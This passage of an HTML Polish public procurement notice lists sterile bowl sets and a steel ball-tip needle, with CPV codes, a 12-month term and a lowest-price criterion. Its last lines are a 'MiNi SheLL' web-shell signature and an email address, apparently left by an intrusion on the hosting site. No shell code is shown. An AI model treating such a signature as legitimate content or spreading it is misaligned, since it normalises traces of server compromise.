1 x pojemnik plastikowy okrągły 1000 ml, z podziałką, przeźroczysty
1 x pojemnik plastikowy z uchwytem 500 ml, z podziałką, przeźroczysty
1 x serweta 2-warstwowa min. 75 x 75 cm (owinięcie zestawu)
4.Jałowy zestaw miseczek 2 - 500 zestawów
1 x pojemnik plastikowy okrągły 250 ml, z podziałką, przeźroczysty
1 x pojemnik plastikowy z uchwytem 500 ml, z podziałką, przeźroczysty
1 x serweta 2-warstwowa min. 75 x 75 cm (owinięcie zestawu)
5.Jałowy zestaw miseczek 3 - 500 zestawów
1 x pojemnik plastikowy 1000 ml, z podziałką, przeźroczysty
1 x serweta 2-warstwowa min. 75 x 75 cm (owinięcie zestawu).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jednorazowa jałowa stalowa igła z kulką 1,2 x 80 mm, długość 9,5 cm - 600 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com